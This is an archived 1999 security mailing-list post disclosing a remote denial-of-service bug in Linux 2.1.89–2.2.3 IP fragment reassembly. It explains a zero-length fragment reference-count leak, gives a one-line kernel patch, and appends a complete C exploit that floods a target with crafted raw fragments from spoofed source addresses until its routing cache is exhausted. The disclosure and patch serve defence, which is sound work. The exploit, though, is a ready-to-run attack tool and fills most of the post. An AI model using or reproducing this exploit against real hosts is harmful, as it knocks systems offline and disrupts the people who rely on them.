DoS for Linux 2.1.89 - 2.2.3: 0 length fragment bug

From: John McDonald (jmcdonalat_private)
Date: Wed Mar 24 1999 - 20:19:37 PST

  • Next message: Aleph One: "Adminitrivia"

    Hi,
    
    The recent release of the Linux 2.2.4 kernel fixed a remote denial of
    service problem in the IP fragment handling code. If you are running a
    Linux kernel between 2.1.89 and 2.2.3, it would probably be a good idea to
    get the latest version. In case that isn't feasible for you, I've included
    a patch in this post. The impact of this problem is that a remote attacker
    can effectively disable a target's IP connectivity. However, for the
    attack to succeed, the attacker will have to deliver several thousand
    packets to the target, which can take up to several minutes. A quick
    exploit and the patch are appended to the end of this post.
    
    The problem starts in ip_glue() in ip_fragment.c:
    
    	/* Copy the data portions of all fragments into the new buffer. */
    	fp = qp->fragments;
    	count = qp->ihlen;
    	while(fp) {
    		if ((fp->len < 0) || ((count + fp->len) > skb->len))
    			goto out_invalid;
    		memcpy((ptr + fp->offset), fp->ptr, fp->len);
    		if (count == qp->ihlen) {
    			skb->dst = dst_clone(fp->skb->dst);
    			skb->dev = fp->skb->dev;
    		}
    		count += fp->len;
    		fp = fp->next;
    	}
    
    The problem in this code is that if you can get a fragment into the
    qp->fragments list that has a length of 0, and is the first fragment in the
    list, then the call to dst_clone() will happen an extra time. The first time
    through the loop, count will necessarily equal qp->ihlen, causing
    dst_clone() to be called. However, if fp->len happens to equal 0, then count
    += fp->len won't increase it, and the next time through the loop, count will
    still equal qp->ihlen. dst_clone() increments a usage count on an element in
    the routing cache. Our 0 length fragment will cause this element in the
    cache to become stranded. The kernel will not free it when it does the
    garbage collection of the cache because it will think it is currently in
    use.
    
    The other component of the problem is that the call to allocate a new entry
    in the routing cache does a check to see if the hashtable that comprises the
    cache is at a saturated state. If it is, it proceeds to do a garbage
    collection. If the number of entries in the cache, after this garbage
    collection, is still higher than the threshold, then dst_alloc() will fail.
    So, if we generate enough stranded entries in the routing cache (4096 in
    2.2.3) via our malicious frags, then all further calls to dst_alloc will
    fail.
    
    We can get a 0 length fragment into the head of the list by doing the
    following:
    
    Send a fragment at offset 0, with a length of X, and IP_MF set. This creates
    our list.
    
    Send a 0 length fragment at offset 0, where the ip header length is equal to
    the ip total length, and IP_MF is set. This will be treated as coming before
    the fragment already in our list, because it has an offset equal to the
    offset of the existing fragment. It doesn't overlap any, because it's end is
    equal to the following fragment's offset.
    
    Send a fragment at offset X, with IP_MF not set. This will mark the end of
    our set of fragments. ip_done() will return true because it will see the
    first frag going from 0 to 0, the second going from 0 to X, and the third
    going from X to the end. Our fragments will get passed into ip_glue().
    
    -horizon
    
    Here is the patch:
    
    --- linux-2.2.3/net/ipv4/ip_fragment.c  Wed Mar 24 22:48:26 1999
    +++ linux/net/ipv4/ip_fragment.c        Wed Mar 24 22:44:24 1999
    @@ -17,6 +17,7 @@
      *             xxxx            :       Overlapfrag bug.
      *             Ultima          :       ip_expire() kernel panic.
      *             Bill Hawes      :       Frag accounting and evictor fixes.
    + *             John McDonald   :       0 length frag bug.
      */
    
     #include <linux/types.h>
    @@ -357,7 +358,7 @@
            fp = qp->fragments;
            count = qp->ihlen;
            while(fp) {
    -               if ((fp->len < 0) || ((count + fp->len) > skb->len))
    +               if ((fp->len <= 0) || ((count + fp->len) > skb->len))
                            goto out_invalid;
                    memcpy((ptr + fp->offset), fp->ptr, fp->len);
                    if (count == qp->ihlen) {
    
    And here is the exploit:
    
    /*
     * sesquipedalian.c - Demonstrates a DoS bug in Linux 2.1.89 - 2.2.3
     *
     * by horizon <jmcdonalat_private>
     *
     * This sends a series of IP fragments such that a 0 length fragment is first
     * in the fragment list. This causes a reference count on the cached routing
     * information for that packet's originator to be incremented one extra time.
     * This makes it impossible for the kernel to deallocate the destination entry
     * and remove it from the cache.
     *
     * If we send enough fragments such that there are at least 4096 stranded
     * dst cache entries, then the target machine will no longer be able to
     * allocate new cache entries, and IP communication will be effectively
     * disabled. You will need to set the delay such that packets are not being
     * dropped, and you will probably need to let the program run for a few
     * minutes to have the full effect. This was written for OpenBSD and Linux.
     *
     * Thanks to vacuum, colonwq, duke, rclocal, sygma, and antilove for testing.
     */
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <netinet/in.h>
    #include <sys/socket.h>
    #include <netdb.h>
    #include <arpa/inet.h>
    
    struct my_ip_header
    {
    	unsigned char  ip_hl:4,         /* header length */
    		ip_v:4;               /* version */
    	unsigned char  ip_tos;          /* type of service */
    	unsigned short ip_len;          /* total length */
    	unsigned short ip_id;           /* identification */
    	unsigned short ip_off;          /* fragment offset field */
    #define IP_RF 0x8000                    /* reserved fragment flag */
    #define IP_DF 0x4000                    /* dont fragment flag */
    #define IP_MF 0x2000                    /* more fragments flag */
    #define IP_OFFMASK 0x1fff               /* mask for fragmenting bits */
    	unsigned char  ip_ttl;          /* time to live */
    	unsigned char  ip_p;                    /* protocol */
    	unsigned short ip_sum;          /* checksum */
    	unsigned long ip_src, ip_dst; /* source and dest address */
    };
    
    struct my_udp_header
    {
    	unsigned short uh_sport;
    	unsigned short uh_dport;
    	unsigned short uh_ulen;
    	unsigned short uh_sum;
    };
    
    #define IHLEN (sizeof (struct my_ip_header))
    #define UHLEN (sizeof (struct my_udp_header))
    
    #ifdef __OpenBSD__
    #define EXTRA 8
    #else
    #define EXTRA 0
    #endif
    
    unsigned short checksum(unsigned short *data,unsigned short length)
    {
            register long value;
            u_short i;
    
            for(i=0;i<(length>>1);i++)
                    value+=data[i];
    
            if((length&1)==1)
                    value+=(data[i]<<8);
    
            value=(value&65535)+(value>>16);
    
            return(~value);
    }
    
    unsigned long resolve( char *hostname)
    {
    	long result;
    	struct hostent *hp;
    
    	if ((result=inet_addr(hostname))==-1)
    	{
    		if ((hp=gethostbyname(hostname))==0)
    		{
    			fprintf(stderr,"Can't resolve target.\n");
    			exit(1);
    		}
    		bcopy(hp->h_addr,&result,4);
    	}
    	return result;
    }
    
    void usage(void)
    {
    	fprintf(stderr,"usage: ./sqpd [-s sport] [-d dport] [-n count] [-u delay] source target\n");
    	exit(0);
    }
    
    
    void sendem(int s, unsigned long source, unsigned long dest,
    		unsigned short sport, unsigned short dport)
    {
    	static char buffer[8192];
    	struct my_ip_header *ip;
    	struct my_udp_header *udp;
    	struct sockaddr_in sa;
    
    	bzero(&sa,sizeof(struct sockaddr_in));
    	sa.sin_family=AF_INET;
    	sa.sin_port=htons(sport);
    	sa.sin_addr.s_addr=dest;
    
    	bzero(buffer,IHLEN+32);
    	
    	ip=(struct my_ip_header *)buffer;
    	udp=(struct my_udp_header *)&(buffer[IHLEN]);
    
    	ip->ip_v = 4;
    	ip->ip_hl = IHLEN >>2;
    	ip->ip_tos = 0;
    	ip->ip_id = htons(random() & 0xFFFF);
    	ip->ip_ttl = 142;
    	ip->ip_p = IPPROTO_UDP;
    	ip->ip_src = source;
    	ip->ip_dst = dest;
    	udp->uh_sport = htons(sport);
    	udp->uh_dport = htons(dport);
    	udp->uh_ulen = htons(64-UHLEN);
    	udp->uh_sum = 0;
    
    	/* Our first fragment will have an offset of 0, and be 32 bytes
    	   long. This gets added as the only element in the fragment
    	   list. */
    
    	ip->ip_len = htons(IHLEN+32);
    	ip->ip_off = htons(IP_MF);
    	ip->ip_sum = 0;
    	ip->ip_sum = checksum((u_short *)buffer,IHLEN+32);
    
    	if (sendto(s,buffer,IHLEN+32,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
    	{
    		perror("sendto");
    		exit(1);
    	}
    
    	/* Our second fragment will have an offset of 0, and a 0 length.
    	   This gets added to the list before our previous fragment,
    	   making it first in line. */
    
    	ip->ip_len = htons(IHLEN);
    	ip->ip_off = htons(IP_MF);
    	ip->ip_sum = 0;
    	ip->ip_sum = checksum((u_short *)buffer,IHLEN);
    
    	if (sendto(s,buffer,IHLEN+EXTRA,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
    	{
    		perror("sendto");
    		exit(1);
    	}
    
    	/* Our third and final frag has an offset of 4 (32 bytes), and a
    	   length of 32 bytes. This passes our three frags up to ip_glue. */
    
    	ip->ip_len = htons(IHLEN+32);
    	ip->ip_off = htons(32/8);
    	ip->ip_sum = 0;
    	ip->ip_sum = checksum((u_short *)buffer,IHLEN+32);
    
    	if (sendto(s,buffer,IHLEN+32,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
    	{
    		perror("sendto");
    		exit(1);
    	}
    }
    
    int main(int argc, char **argv)
    {
    	int sock;
    	int on=1,i;
    	unsigned long source, dest;
    	unsigned short sport=53, dport=16384;
    	int delay=20000, count=15000;
    
    	if (argc<3)
    		usage();	
    
    	while ((i=getopt(argc,argv,"s:d:n:u:"))!=-1)
    	{
    		switch (i)
    		{
    			case 's': sport=atoi(optarg);
    				  break;
    			case 'd': dport=atoi(optarg);
    				  break;
    			case 'n': count=atoi(optarg);
    				  break;
    			case 'u': delay=atoi(optarg);
    				  break;
    			default:  usage();
    		}
    	}
    	
    	argc-=optind;
    	argv+=optind;
    
    	source=resolve(argv[0]);
            dest=resolve(argv[1]);
    
    	srandom(time((time_t)0)*getpid());
    
    	if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    	{
    		perror("socket");
    		exit(1);
    	}
    
    	if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0)
    	{
    		perror("setsockopt: IP_HDRINCL");
    		exit(1);
    	}
    
    	fprintf(stdout,"\nStarting attack on %s ...",argv[1]);
    
    	for (i=0; i<count; i++)
    	{
    		sendem(sock,source+htonl(i),dest,sport,dport);
    		if (!(i%2))
    			usleep(delay);
    		if (!(i%100))
    		{
    			if (!(i%2000))
    				fprintf(stdout,"\n");
    			fprintf(stdout,".");
    			fflush(stdout);
    		}
    	}
    
    	fprintf(stdout,"\nDone.\n");
    	exit(1);
    }
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:39:33 PDT